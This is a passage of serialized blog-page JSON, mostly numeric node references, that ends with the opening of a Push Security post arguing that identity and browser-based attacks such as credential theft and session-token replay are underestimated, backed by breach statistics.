ype":173,"value":183717,"marks":224348,"data":224349},[],{},{"nodeType":178,"data":224351,"content":224352},{},[224353],{"nodeType":173,"value":183724,"marks":224354,"data":224355},[],{},{"nodeType":312,"data":224357,"content":224360},{"target":224358},{"sys":224359},{"id":183731,"type":317,"linkType":318},[],{"nodeType":178,"data":224362,"content":224363},{},[224364,224367,224375],{"nodeType":173,"value":183606,"marks":224365,"data":224366},[],{},{"nodeType":1698,"data":224368,"content":224371},{"target":224369},{"sys":224370},{"id":183743,"type":317,"linkType":318},[224372],{"nodeType":173,"value":157048,"marks":224373,"data":224374},[],{},{"nodeType":173,"value":37,"marks":224376,"data":224377},[],{},{"nodeType":235,"data":224379,"content":224380},{},[224381],{"nodeType":173,"value":183755,"marks":224382,"data":224383},[],{},{"nodeType":178,"data":224385,"content":224386},{},[224387],{"nodeType":173,"value":183762,"marks":224388,"data":224389},[],{},{"nodeType":178,"data":224391,"content":224392},{},[224393],{"nodeType":173,"value":183769,"marks":224394,"data":224395},[],{},{"nodeType":178,"data":224397,"content":224398},{},[224399],{"nodeType":173,"value":183776,"marks":224400,"data":224401},[],{},{"nodeType":312,"data":224403,"content":224406},{"target":224404},{"sys":224405},{"id":183783,"type":317,"linkType":318},[],{"nodeType":178,"data":224408,"content":224409},{},[224410,224413,224421],{"nodeType":173,"value":183606,"marks":224411,"data":224412},[],{},{"nodeType":1698,"data":224414,"content":224417},{"target":224415},{"sys":224416},{"id":114256,"type":317,"linkType":318},[224418],{"nodeType":173,"value":114259,"marks":224419,"data":224420},[],{},{"nodeType":173,"value":37,"marks":224422,"data":224423},[],{},{"nodeType":235,"data":224425,"content":224426},{},[224427],{"nodeType":173,"value":2631,"marks":224428,"data":224429},[],{},{"nodeType":178,"data":224431,"content":224432},{},[224433],{"nodeType":173,"value":183812,"marks":224434,"data":224435},[],{},{"nodeType":312,"data":224437,"content":224440},{"target":224438},{"sys":224439},{"id":183819,"type":317,"linkType":318},[],{"nodeType":178,"data":224442,"content":224443},{},[224444,224447,224455],{"nodeType":173,"value":183606,"marks":224445,"data":224446},[],{},{"nodeType":1698,"data":224448,"content":224451},{"target":224449},{"sys":224450},{"id":2466,"type":317,"linkType":318},[224452],{"nodeType":173,"value":126474,"marks":224453,"data":224454},[],{},{"nodeType":173,"value":37,"marks":224456,"data":224457},[],{},{"nodeType":169,"data":224459,"content":224460},{},[224461],{"nodeType":173,"value":183842,"marks":224462,"data":224463},[],{},{"nodeType":178,"data":224465,"content":224466},{},[224467],{"nodeType":173,"value":183849,"marks":224468,"data":224469},[],{},{"nodeType":178,"data":224471,"content":224472},{},[224473],{"nodeType":173,"value":183856,"marks":224474,"data":224475},[],{},{"nodeType":250,"data":224477,"content":224478},{},[224479,224492,224505],{"nodeType":254,"data":224480,"content":224481},{},[224482],{"nodeType":178,"data":224483,"content":224484},{},[224485,224489],{"nodeType":173,"value":157359,"marks":224486,"data":224488},[224487],{"type":370},{},{"nodeType":173,"value":157364,"marks":224490,"data":224491},[],{},{"nodeType":254,"data":224493,"content":224494},{},[224495],{"nodeType":178,"data":224496,"content":224497},{},[224498,224502],{"nodeType":173,"value":157374,"marks":224499,"data":224501},[224500],{"type":370},{},{"nodeType":173,"value":157379,"marks":224503,"data":224504},[],{},{"nodeType":254,"data":224506,"content":224507},{},[224508],{"nodeType":178,"data":224509,"content":224510},{},[224511,224515],{"nodeType":173,"value":157389,"marks":224512,"data":224514},[224513],{"type":370},{},{"nodeType":173,"value":157394,"marks":224516,"data":224517},[],{},{"nodeType":178,"data":224519,"content":224520},{},[224521],{"nodeType":173,"value":183905,"marks":224522,"data":224523},[],{},{"nodeType":250,"data":224525,"content":224526},{},[224527,224543,224559,224572],{"nodeType":254,"data":224528,"content":224529},{},[224530],{"nodeType":178,"data":224531,"content":224532},{},[224533,224536,224540],{"nodeType":173,"value":183918,"marks":224534,"data":224535},[],{},{"nodeType":173,"value":183922,"marks":224537,"data":224539},[224538],{"type":370},{},{"nodeType":173,"value":157428,"marks":224541,"data":224542},[],{},{"nodeType":254,"data":224544,"content":224545},{},[224546],{"nodeType":178,"data":224547,"content":224548},{},[224549,224552,224556],{"nodeType":173,"value":183936,"marks":224550,"data":224551},[],{},{"nodeType":173,"value":183940,"marks":224553,"data":224555},[224554],{"type":370},{},{"nodeType":173,"value":183945,"marks":224557,"data":224558},[],{},{"nodeType":254,"data":224560,"content":224561},{},[224562],{"nodeType":178,"data":224563,"content":224564},{},[224565,224569],{"nodeType":173,"value":183955,"marks":224566,"data":224568},[224567],{"type":370},{},{"nodeType":173,"value":183960,"marks":224570,"data":224571},[],{},{"nodeType":254,"data":224573,"content":224574},{},[224575],{"nodeType":178,"data":224576,"content":224577},{},[224578,224582],{"nodeType":173,"value":183970,"marks":224579,"data":224581},[224580],{"type":370},{},{"nodeType":173,"value":183975,"marks":224583,"data":224584},[],{},{"nodeType":178,"data":224586,"content":224587},{},[224588,224591,224595],{"nodeType":173,"value":183982,"marks":224589,"data":224590},[],{},{"nodeType":173,"value":2718,"marks":224592,"data":224594},[224593],{"type":370},{},{"nodeType":173,"value":183990,"marks":224596,"data":224597},[],{},{"nodeType":312,"data":224599,"content":224602},{"target":224600},{"sys":224601},{"id":183997,"type":317,"linkType":318},[],{"nodeType":178,"data":224604,"content":224605},{},[224606],{"nodeType":173,"value":184003,"marks":224607,"data":224608},[],{},{"nodeType":169,"data":224610,"content":224611},{},[224612],{"nodeType":173,"value":184010,"marks":224613,"data":224614},[],{},{"nodeType":178,"data":224616,"content":224617},{},[224618],{"nodeType":173,"value":184017,"marks":224619,"data":224620},[],{},{"nodeType":178,"data":224622,"content":224623},{},[224624],{"nodeType":173,"value":184024,"marks":224625,"data":224626},[],{},{"nodeType":178,"data":224628,"content":224629},{},[224630,224633,224639],{"nodeType":173,"value":184031,"marks":224631,"data":224632},[],{},{"nodeType":186,"data":224634,"content":224635},{"uri":114007},[224636],{"nodeType":173,"value":184038,"marks":224637,"data":224638},[],{},{"nodeType":173,"value":184042,"marks":224640,"data":224641},[],{},{"nodeType":169,"data":224643,"content":224644},{},[224645],{"nodeType":173,"value":71801,"marks":224646,"data":224647},[],{},{"nodeType":178,"data":224649,"content":224650},{},[224651,224654,224660],{"nodeType":173,"value":184055,"marks":224652,"data":224653},[],{},{"nodeType":186,"data":224655,"content":224656},{"uri":114457},[224657],{"nodeType":173,"value":88194,"marks":224658,"data":224659},[],{},{"nodeType":173,"value":184065,"marks":224661,"data":224662},[],{},{"items":224664},[224665,224667],{"sys":224666,"name":18399},{"id":18398},{"sys":224668,"name":509},{"id":508},{"items":224670},[224671],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":224672},{"url":2911},{"__typename":1528,"sys":224674,"content":224675,"title":173142,"synopsis":185450,"hashTags":118,"publishedDate":185451,"slug":173143,"tagsCollection":225393,"authorsCollection":225399},{"id":156725},{"json":224676},{"nodeType":165,"data":224677,"content":224678},{},[224679,224685,224691,224697,224723,224729,224735,224750,224756,224762,224777,224783,224789,224795,224800,224806,224845,224851,224857,224863,224884,224890,224896,224902,224944,224950,224956,224962,224968,224978,224984,224991,224997,225026,225032,225038,225044,225050,225110,225117,225123,225129,225159,225165,225172,225178,225184,225194,225207,225233,225249,225255,225270,225276,225282,225297,225303,225309,225315,225345,225351,225367,225382,225387],{"nodeType":178,"data":224680,"content":224681},{},[224682],{"nodeType":173,"value":184644,"marks":224683,"data":224684},[],{},{"nodeType":178,"data":224686,"content":224687},{},[224688],{"nodeType":173,"value":184651,"marks":224689,"data":224690},[],{},{"nodeType":178,"data":224692,"content":224693},{},[224694],{"nodeType":173,"value":184658,"marks":224695,"data":224696},[],{},{"nodeType":178,"data":224698,"content":224699},{},[224700,224703,224710,224713,224720],{"nodeType":173,"value":37,"marks":224701,"data":224702},[],{},{"nodeType":186,"data":224704,"content":224705},{"uri":832},[224706],{"nodeType":173,"value":26529,"marks":224707,"data":224709},[224708],{"type":194},{},{"nodeType":173,"value":184675,"marks":224711,"data":224712},[],{},{"nodeType":186,"data":224714,"content":224715},{"uri":184680},[224716],{"nodeType":173,"value":182807,"marks":224717,"data":224719},[224718],{"type":194},{},{"nodeType":173,"value":184687,"marks":224721,"data":224722},[],{},{"nodeType":169,"data":224724,"content":224725},{},[224726],{"nodeType":173,"value":184694,"marks":224727,"data":224728},[],{},{"nodeType":178,"data":224730,"content":224731},{},[224732],{"nodeType":173,"value":184701,"marks":224733,"data":224734},[],{},{"nodeType":178,"data":224736,"content":224737},{},[224738,224741,224747],{"nodeType":173,"value":184708,"marks":224739,"data":224740},[],{},{"nodeType":186,"data":224742,"content":224743},{"uri":4492},[224744],{"nodeType":173,"value":184715,"marks":224745,"data":224746},[],{},{"nodeType":173,"value":2340,"marks":224748,"data":224749},[],{},{"nodeType":235,"data":224751,"content":224752},{},[224753],{"nodeType":173,"value":184725,"marks":224754,"data":224755},[],{},{"nodeType":178,"data":224757,"content":224758},{},[224759],{"nodeType":173,"value":184732,"marks":224760,"data":224761},[],{},{"nodeType":178,"data":224763,"content":224764},{},[224765,224768,224774],{"nodeType":173,"value":184739,"marks":224766,"data":224767},[],{},{"nodeType":186,"data":224769,"content":224770},{"uri":4492},[224771],{"nodeType":173,"value":184746,"marks":224772,"data":224773},[],{},{"nodeType":173,"value":184750,"marks":224775,"data":224776},[],{},{"nodeType":178,"data":224778,"content":224779},{},[224780],{"nodeType":173,"value":184757,"marks":224781,"data":224782},[],{},{"nodeType":235,"data":224784,"content":224785},{},[224786],{"nodeType":173,"value":184764,"marks":224787,"data":224788},[],{},{"nodeType":178,"data":224790,"content":224791},{},[224792],{"nodeType":173,"value":184771,"marks":224793,"data":224794},[],{},{"nodeType":312,"data":224796,"content":224799},{"target":224797},{"sys":224798},{"id":184778,"type":317,"linkType":318},[],{"nodeType":178,"data":224801,"content":224802},{},[224803],{"nodeType":173,"value":184784,"marks":224804,"data":224805},[],{},{"nodeType":250,"data":224807,"content":224808},{},[224809,224818,224827,224836],{"nodeType":254,"data":224810,"content":224811},{},[224812],{"nodeType":178,"data":224813,"content":224814},{},[224815],{"nodeType":173,"value":184797,"marks":224816,"data":224817},[],{},{"nodeType":254,"data":224819,"content":224820},{},[224821],{"nodeType":178,"data":224822,"content":224823},{},[224824],{"nodeType":173,"value":184807,"marks":224825,"data":224826},[],{},{"nodeType":254,"data":224828,"content":224829},{},[224830],{"nodeType":178,"data":224831,"content":224832},{},[224833],{"nodeType":173,"value":184817,"marks":224834,"data":224835},[],{},{"nodeType":254,"data":224837,"content":224838},{},[224839],{"nodeType":178,"data":224840,"content":224841},{},[224842],{"nodeType":173,"value":184827,"marks":224843,"data":224844},[],{},{"nodeType":178,"data":224846,"content":224847},{},[224848],{"nodeType":173,"value":184834,"marks":224849,"data":224850},[],{},{"nodeType":235,"data":224852,"content":224853},{},[224854],{"nodeType":173,"value":184841,"marks":224855,"data":224856},[],{},{"nodeType":178,"data":224858,"content":224859},{},[224860],{"nodeType":173,"value":184848,"marks":224861,"data":224862},[],{},{"nodeType":250,"data":224864,"content":224865},{},[224866,224875],{"nodeType":254,"data":224867,"content":224868},{},[224869],{"nodeType":178,"data":224870,"content":224871},{},[224872],{"nodeType":173,"value":184861,"marks":224873,"data":224874},[],{},{"nodeType":254,"data":224876,"content":224877},{},[224878],{"nodeType":178,"data":224879,"content":224880},{},[224881],{"nodeType":173,"value":184871,"marks":224882,"data":224883},[],{},{"nodeType":178,"data":224885,"content":224886},{},[224887],{"nodeType":173,"value":184878,"marks":224888,"data":224889},[],{},{"nodeType":235,"data":224891,"content":224892},{},[224893],{"nodeType":173,"value":184885,"marks":224894,"data":224895},[],{},{"nodeType":178,"data":224897,"content":224898},{},[224899],{"nodeType":173,"value":184892,"marks":224900,"data":224901},[],{},{"nodeType":250,"data":224903,"content":224904},{},[224905,224918,224931],{"nodeType":254,"data":224906,"content":224907},{},[224908],{"nodeType":178,"data":224909,"content":224910},{},[224911,224915],{"nodeType":173,"value":184905,"marks":224912,"data":224914},[224913],{"type":370},{},{"nodeType":173,"value":184910,"marks":224916,"data":224917},[],{},{"nodeType":254,"data":224919,"content":224920},{},[224921],{"nodeType":178,"data":224922,"content":224923},{},[224924,224928],{"nodeType":173,"value":184920,"marks":224925,"data":224927},[224926],{"type":370},{},{"nodeType":173,"value":184925,"marks":224929,"data":224930},[],{},{"nodeType":254,"data":224932,"content":224933},{},[224934],{"nodeType":178,"data":224935,"content":224936},{},[224937,224941],{"nodeType":173,"value":184935,"marks":224938,"data":224940},[224939],{"type":370},{},{"nodeType":173,"value":184940,"marks":224942,"data":224943},[],{},{"nodeType":178,"data":224945,"content":224946},{},[224947],{"nodeType":173,"value":184947,"marks":224948,"data":224949},[],{},{"nodeType":178,"data":224951,"content":224952},{},[224953],{"nodeType":173,"value":184954,"marks":224954,"data":224955},[],{},{"nodeType":178,"data":224957,"content":224958},{},[224959],{"nodeType":173,"value":184961,"marks":224960,"data":224961},[],{},{"nodeType":169,"data":224963,"content":224964},{},[224965],{"nodeType":173,"value":184968,"marks":224966,"data":224967},[],{},{"nodeType":178,"data":224969,"content":224970},{},[224971,224975],{"nodeType":173,"value":184975,"marks":224972,"data":224974},[224973],{"type":370},{},{"nodeType":173,"value":184980,"marks":224976,"data":224977},[],{},{"nodeType":178,"data":224979,"content":224980},{},[224981],{"nodeType":173,"value":184987,"marks":224982,"data":224983},[],{},{"nodeType":178,"data":224985,"content":224986},{},[224987],{"nodeType":173,"value":184994,"marks":224988,"data":224990},[224989],{"type":370},{},{"nodeType":178,"data":224992,"content":224993},{},[224994],{"nodeType":173,"value":185002,"marks":224995,"data":224996},[],{},{"nodeType":250,"data":224998,"content":224999},{},[225000,225013],{"nodeType":254,"data":225001,"content":225002},{},[225003],{"nodeType":178,"data":225004,"content":225005},{},[225006,225010],{"nodeType":173,"value":185015,"marks":225007,"data":225009},[225008],{"type":370},{},{"nodeType":173,"value":185020,"marks":225011,"data":225012},[],{},{"nodeType":254,"data":225014,"content":225015},{},[225016],{"nodeType":178,"data":225017,"content":225018},{},[225019,225023],{"nodeType":173,"value":185030,"marks":225020,"data":225022},[225021],{"type":370},{},{"nodeType":173,"value":185035,"marks":225024,"data":225025},[],{},{"nodeType":178,"data":225027,"content":225028},{},[225029],{"nodeType":173,"value":185042,"marks":225030,"data":225031},[],{},{"nodeType":235,"data":225033,"content":225034},{},[225035],{"nodeType":173,"value":185049,"marks":225036,"data":225037},[],{},{"nodeType":178,"data":225039,"content":225040},{},[225041],{"nodeType":173,"value":185056,"marks":225042,"data":225043},[],{},{"nodeType":178,"data":225045,"content":225046},{},[225047],{"nodeType":173,"value":185063,"marks":225048,"data":225049},[],{},{"nodeType":250,"data":225051,"content":225052},{},[225053,225072,225091],{"nodeType":254,"data":225054,"content":225055},{},[225056],{"nodeType":178,"data":225057,"content":225058},{},[225059,225062,225069],{"nodeType":173,"value":185076,"marks":225060,"data":225061},[],{},{"nodeType":186,"data":225063,"content":225064},{"uri":125812},[225065],{"nodeType":173,"value":1255,"marks":225066,"data":225068},[225067],{"type":194},{},{"nodeType":173,"value":53584,"marks":225070,"data":225071},[],{},{"nodeType":254,"data":225073,"content":225074},{},[225075],{"nodeType":178,"data":225076,"content":225077},{},[225078,225081,225088],{"nodeType":173,"value":174447,"marks":225079,"data":225080},[],{},{"nodeType":186,"data":225082,"content":225083},{"uri":125982},[225084],{"nodeType":173,"value":1300,"marks":225085,"data":225087},[225086],{"type":194},{},{"nodeType":173,"value":53584,"marks":225089,"data":225090},[],{},{"nodeType":254,"data":225092,"content":225093},{},[225094],{"nodeType":178,"data":225095,"content":225096},{},[225097,225100,225107],{"nodeType":173,"value":174385,"marks":225098,"data":225099},[],{},{"nodeType":186,"data":225101,"content":225102},{"uri":174390},[225103],{"nodeType":173,"value":174393,"marks":225104,"data":225106},[225105],{"type":194},{},{"nodeType":173,"value":53584,"marks":225108,"data":225109},[],{},{"nodeType":178,"data":225111,"content":225112},{},[225113],{"nodeType":173,"value":185131,"marks":225114,"data":225116},[225115],{"type":370},{},{"nodeType":178,"data":225118,"content":225119},{},[225120],{"nodeType":173,"value":185139,"marks":225121,"data":225122},[],{},{"nodeType":178,"data":225124,"content":225125},{},[225126],{"nodeType":173,"value":185146,"marks":225127,"data":225128},[],{},{"nodeType":250,"data":225130,"content":225131},{},[225132,225150],{"nodeType":254,"data":225133,"content":225134},{},[225135],{"nodeType":178,"data":225136,"content":225137},{},[225138,225141,225147],{"nodeType":173,"value":185159,"marks":225139,"data":225140},[],{},{"nodeType":186,"data":225142,"content":225143},{"uri":4492},[225144],{"nodeType":173,"value":185166,"marks":225145,"data":225146},[],{},{"nodeType":173,"value":185170,"marks":225148,"data":225149},[],{},{"nodeType":254,"data":225151,"content":225152},{},[225153],{"nodeType":178,"data":225154,"content":225155},{},[225156],{"nodeType":173,"value":185180,"marks":225157,"data":225158},[],{},{"nodeType":178,"data":225160,"content":225161},{},[225162],{"nodeType":173,"value":185187,"marks":225163,"data":225164},[],{},{"nodeType":178,"data":225166,"content":225167},{},[225168],{"nodeType":173,"value":185194,"marks":225169,"data":225171},[225170],{"type":370},{},{"nodeType":235,"data":225173,"content":225174},{},[225175],{"nodeType":173,"value":185202,"marks":225176,"data":225177},[],{},{"nodeType":178,"data":225179,"content":225180},{},[225181],{"nodeType":173,"value":185209,"marks":225182,"data":225183},[],{},{"nodeType":178,"data":225185,"content":225186},{},[225187,225190],{"nodeType":173,"value":185216,"marks":225188,"data":225189},[],{},{"nodeType":173,"value":185220,"marks":225191,"data":225193},[225192],{"type":370},{},{"nodeType":178,"data":225195,"content":225196},{},[225197,225200,225204],{"nodeType":173,"value":185228,"marks":225198,"data":225199},[],{},{"nodeType":173,"value":185232,"marks":225201,"data":225203},[225202],{"type":370},{},{"nodeType":173,"value":185237,"marks":225205,"data":225206},[],{},{"nodeType":178,"data":225208,"content":225209},{},[225210,225213,225220,225223,225230],{"nodeType":173,"value":185244,"marks":225211,"data":225212},[],{},{"nodeType":186,"data":225214,"content":225215},{"uri":63250},[225216],{"nodeType":173,"value":63256,"marks":225217,"data":225219},[225218],{"type":194},{},{"nodeType":173,"value":185255,"marks":225221,"data":225222},[],{},{"nodeType":186,"data":225224,"content":225225},{"uri":70029},[225226],{"nodeType":173,"value":185262,"marks":225227,"data":225229},[225228],{"type":194},{},{"nodeType":173,"value":60235,"marks":225231,"data":225232},[],{},{"nodeType":178,"data":225234,"content":225235},{},[225236,225239,225246],{"nodeType":173,"value":185273,"marks":225237,"data":225238},[],{},{"nodeType":186,"data":225240,"content":225241},{"uri":49844},[225242],{"nodeType":173,"value":185280,"marks":225243,"data":225245},[225244],{"type":194},{},{"nodeType":173,"value":481,"marks":225247,"data":225248},[],{},{"nodeType":169,"data":225250,"content":225251},{},[225252],{"nodeType":173,"value":185291,"marks":225253,"data":225254},[],{},{"nodeType":178,"data":225256,"content":225257},{},[225258,225261,225267],{"nodeType":173,"value":5039,"marks":225259,"data":225260},[],{},{"nodeType":186,"data":225262,"content":225263},{"uri":74621},[225264],{"nodeType":173,"value":185304,"marks":225265,"data":225266},[],{},{"nodeType":173,"value":185308,"marks":225268,"data":225269},[],{},{"nodeType":178,"data":225271,"content":225272},{},[225273],{"nodeType":173,"value":185315,"marks":225274,"data":225275},[],{},{"nodeType":178,"data":225277,"content":225278},{},[225279],{"nodeType":173,"value":185322,"marks":225280,"data":225281},[],{},{"nodeType":178,"data":225283,"content":225284},{},[225285,225288,225294],{"nodeType":173,"value":185329,"marks":225286,"data":225287},[],{},{"nodeType":186,"data":225289,"content":225290},{"uri":184425},[225291],{"nodeType":173,"value":185336,"marks":225292,"data":225293},[],{},{"nodeType":173,"value":37,"marks":225295,"data":225296},[],{},{"nodeType":178,"data":225298,"content":225299},{},[225300],{"nodeType":173,"value":185346,"marks":225301,"data":225302},[],{},{"nodeType":169,"data":225304,"content":225305},{},[225306],{"nodeType":173,"value":185353,"marks":225307,"data":225308},[],{},{"nodeType":178,"data":225310,"content":225311},{},[225312],{"nodeType":173,"value":185360,"marks":225313,"data":225314},[],{},{"nodeType":250,"data":225316,"content":225317},{},[225318,225327,225336],{"nodeType":254,"data":225319,"content":225320},{},[225321],{"nodeType":178,"data":225322,"content":225323},{},[225324],{"nodeType":173,"value":185373,"marks":225325,"data":225326},[],{},{"nodeType":254,"data":225328,"content":225329},{},[225330],{"nodeType":178,"data":225331,"content":225332},{},[225333],{"nodeType":173,"value":185383,"marks":225334,"data":225335},[],{},{"nodeType":254,"data":225337,"content":225338},{},[225339],{"nodeType":178,"data":225340,"content":225341},{},[225342],{"nodeType":173,"value":185393,"marks":225343,"data":225344},[],{},{"nodeType":178,"data":225346,"content":225347},{},[225348],{"nodeType":173,"value":185400,"marks":225349,"data":225350},[],{},{"nodeType":178,"data":225352,"content":225353},{},[225354,225357,225364],{"nodeType":173,"value":185407,"marks":225355,"data":225356},[],{},{"nodeType":186,"data":225358,"content":225359},{"uri":97117},[225360],{"nodeType":173,"value":185414,"marks":225361,"data":225363},[225362],{"type":194},{},{"nodeType":173,"value":37,"marks":225365,"data":225366},[],{},{"nodeType":178,"data":225368,"content":225369},{},[225370,225373,225379],{"nodeType":173,"value":185425,"marks":225371,"data":225372},[],{},{"nodeType":186,"data":225374,"content":225375},{"uri":106719},[225376],{"nodeType":173,"value":185432,"marks":225377,"data":225378},[],{},{"nodeType":173,"value":2340,"marks":225380,"data":225381},[],{},{"nodeType":312,"data":225383,"content":225386},{"target":225384},{"sys":225385},{"id":185442,"type":317,"linkType":318},[],{"nodeType":178,"data":225388,"content":225389},{},[225390],{"nodeType":173,"value":37,"marks":225391,"data":225392},[],{},{"items":225394},[225395,225397],{"sys":225396,"name":505},{"id":504},{"sys":225398,"name":509},{"id":508},{"items":225400},[225401],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":225402},{"url":1496},{"items":225404},[225405],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":225406},{"url":1496},{"json":225408,"links":226764},{"data":225409,"content":225410,"nodeType":165},{},[225411,225431,225437,225444,225451,225472,225479,225482,225489,225496,225503,225510,225596,225603,225693,225701,225708,225715,225723,225726,225733,225740,225747,225776,225809,225837,225844,225851,225881,225888,225920,225927,225955,225962,225969,225996,226008,226015,226034,226064,226076,226079,226086,226106,226118,226136,226151,226158,226176,226206,226225,226232,226239,226257,226264,226272,226275,226282,226289,226326,226334,226341,226348,226355,226438,226462,226469,226476,226488,226507,226519,226522,226529,226536,226599,226617,226622,226625,226632,226661,226668,226675,226753,226758],{"data":225412,"content":225413,"nodeType":178},{},[225414,225418,225427],{"data":225415,"marks":225416,"value":225417,"nodeType":173},{},[],"If you caught ",{"data":225419,"content":225421,"nodeType":186},{"uri":225420},"https://cisoseries.com/securing-identities-in-the-cloud/",[225422],{"data":225423,"marks":225424,"value":225426,"nodeType":173},{},[225425],{"type":194},"our CEO Adam’s recent appearance on the Defense in Depth podcast",{"data":225428,"marks":225429,"value":225430,"nodeType":173},{},[]," you’ll have heard some top-tier banter between Geoff and David on the problem of identity security – and how, in Geoff’s words, “way too many people” think they’ve got it covered when it comes to identity attacks.",{"data":225432,"content":225436,"nodeType":312},{"target":225433},{"sys":225434},{"id":225435,"type":317,"linkType":318},"UcfFq2lOiMMJKaDfaNBqx",[],{"data":225438,"content":225439,"nodeType":178},{},[225440],{"data":225441,"marks":225442,"value":225443,"nodeType":173},{},[],"At Push, we’re constantly exploring the limits of controls against the latest threats. But naturally, security teams with hundreds of priorities can’t afford to dedicate the same amount of research time to this problem that we can. This means we come across a lot of common misconceptions about how controls like MFA, SSO and EDR perform against current identity attack techniques. ",{"data":225445,"content":225446,"nodeType":178},{},[225447],{"data":225448,"marks":225449,"value":225450,"nodeType":173},{},[],"These common misconceptions are severely impacting the ability of security teams to plan for, and defend against, identity-based attacks – giving attackers the window of opportunity they need to continue exploiting people and businesses. ",{"data":225452,"content":225453,"nodeType":178},{},[225454,225458,225463,225467],{"data":225455,"marks":225456,"value":225457,"nodeType":173},{},[],"So, we hope that this allows you a clearer perspective when building your identity security strategy, with a realistic view of what a particular control will give you – and what it won’t. ",{"data":225459,"marks":225460,"value":225462,"nodeType":173},{},[225461],{"type":370},"That isn’t to say you should discard any of these controls; they all have an important part to play! ",{"data":225464,"marks":225465,"value":225466,"nodeType":173},{},[],"But, it’s important to be aware of their limitations to be able to build a resilient security model, ",{"data":225468,"marks":225469,"value":225471,"nodeType":173},{},[225470],{"type":370},"with strategic defense in depth to compensate for known weaknesses. ",{"data":225473,"content":225474,"nodeType":178},{},[225475],{"data":225476,"marks":225477,"value":225478,"nodeType":173},{},[],"Without further ado, here are the top reasons why Push Security shouldn’t exist. ",{"data":225480,"content":225481,"nodeType":231},{},[],{"data":225483,"content":225484,"nodeType":169},{},[225485],{"data":225486,"marks":225487,"value":225488,"nodeType":173},{},[],"Reason 1: “Browser-based attacks aren’t a priority”",{"data":225490,"content":225491,"nodeType":178},{},[225492],{"data":225493,"marks":225494,"value":225495,"nodeType":173},{},[],"Particularly in the current economic climate, with many security teams feeling the squeeze, organizations often haven’t budgeted (mentally or financially) for a new kind of threat to factor into their modelling. ",{"data":225497,"content":225498,"nodeType":178},{},[225499],{"data":225500,"marks":225501,"value":225502,"nodeType":173},{},[],"We get it, now isn’t a great time to be tackling a new problem. Getting the budget to do the same as last year is difficult enough, never mind adding something new. ",{"data":225504,"content":225505,"nodeType":178},{},[225506],{"data":225507,"marks":225508,"value":225509,"nodeType":173},{},[],"But, there’s clear evidence that we're facing something a new kind of security problem. Modern attacks are consciously evading the network and endpoint, and are increasingly playing out entirely over the internet in the form of account takeover. ",{"data":225511,"content":225512,"nodeType":250},{},[225513,225534,225554,225575],{"data":225514,"content":225515,"nodeType":254},{},[225516],{"data":225517,"content":225518,"nodeType":178},{},[225519,225523,225530],{"data":225520,"marks":225521,"value":225522,"nodeType":173},{},[],"Stolen creds are the #1 breach vector in 79% of web app attacks (",{"data":225524,"content":225525,"nodeType":186},{"uri":125982},[225526],{"data":225527,"marks":225528,"value":1300,"nodeType":173},{},[225529],{"type":194},{"data":225531,"marks":225532,"value":225533,"nodeType":173},{},[],").  ",{"data":225535,"content":225536,"nodeType":254},{},[225537],{"data":225538,"content":225539,"nodeType":178},{},[225540,225544,225551],{"data":225541,"marks":225542,"value":225543,"nodeType":173},{},[],"147,000 token replay attacks in 2023, 111% increase year-over-year (",{"data":225545,"content":225546,"nodeType":186},{"uri":174431},[225547],{"data":225548,"marks":225549,"value":1255,"nodeType":173},{},[225550],{"type":194},{"data":225552,"marks":225553,"value":60235,"nodeType":173},{},[],{"data":225555,"content":225556,"nodeType":254},{},[225557],{"data":225558,"content":225559,"nodeType":178},{},[225560,225564,225572],{"data":225561,"marks":225562,"value":225563,"nodeType":173},{},[],"80% of attacks involve identity and compromised credentials (",{"data":225565,"content":225567,"nodeType":186},{"uri":225566},"https://www.crowdstrike.com/blog/relentless-threat-activity-puts-identities-in-the-crosshairs/",[225568],{"data":225569,"marks":225570,"value":23980,"nodeType":173},{},[225571],{"type":194},{"data":225573,"marks":225574,"value":225533,"nodeType":173},{},[],{"data":225576,"content":225577,"nodeType":254},{},[225578],{"data":225579,"content":225580,"nodeType":178},{},[225581,225585,225593],{"data":225582,"marks":225583,"value":225584,"nodeType":173},{},[],"4,000 password-based attacks per second observed (",{"data":225586,"content":225588,"nodeType":186},{"uri":225587},"https://www.microsoft.com/en-us/security/security-insider/microsoft-digital-defense-report-2023",[225589],{"data":225590,"marks":225591,"value":1255,"nodeType":173},{},[225592],{"type":194},{"data":225594,"marks":225595,"value":53584,"nodeType":173},{},[],{"data":225597,"content":225598,"nodeType":178},{},[225599],{"data":225600,"marks":225601,"value":225602,"nodeType":173},{},[],"It’s also telling that the cyber crime ecosystem itself seems to be leaning toward the theft, sale, and use of stolen credentials (not just emails and passwords, but session tokens too). ",{"data":225604,"content":225605,"nodeType":250},{},[225606,225627,225649,225671],{"data":225607,"content":225608,"nodeType":254},{},[225609],{"data":225610,"content":225611,"nodeType":178},{},[225612,225615,225623],{"data":225613,"marks":225614,"value":37,"nodeType":173},{},[],{"data":225616,"content":225617,"nodeType":186},{"uri":125982},[225618],{"data":225619,"marks":225620,"value":225622,"nodeType":173},{},[225621],{"type":194},"According to the 2024 DBIR",{"data":225624,"marks":225625,"value":225626,"nodeType":173},{},[],", more than 1000 credentials appear on criminal forums and marketplaces every day, with the majority (65%) appearing less than a day after first being discovered. ",{"data":225628,"content":225629,"nodeType":254},{},[225630],{"data":225631,"content":225632,"nodeType":178},{},[225633,225637,225645],{"data":225634,"marks":225635,"value":225636,"nodeType":173},{},[],"In June, ",{"data":225638,"content":225639,"nodeType":186},{"uri":174799},[225640],{"data":225641,"marks":225642,"value":225644,"nodeType":173},{},[225643],{"type":194},"Troy Hunt at Have I Been Pwned (HIBP) wrote about the impact of channels like Telegram",{"data":225646,"marks":225647,"value":225648,"nodeType":173},{},[]," and the sale of combolists (username, password, login portal URL), after being sent 122GB of data scraped out of thousands of Telegram channels, containing 361M unique email addresses (of which 151M had never been seen in HIBP before). ",{"data":225650,"content":225651,"nodeType":254},{},[225652],{"data":225653,"content":225654,"nodeType":178},{},[225655,225659,225668],{"data":225656,"marks":225657,"value":225658,"nodeType":173},{},[],"In July, ",{"data":225660,"content":225662,"nodeType":186},{"uri":225661},"https://cybernews.com/security/rockyou2024-largest-password-compilation-leak/",[225663],{"data":225664,"marks":225665,"value":225667,"nodeType":173},{},[225666],{"type":194},"10 billion passwords were leaked in the RockYou2024 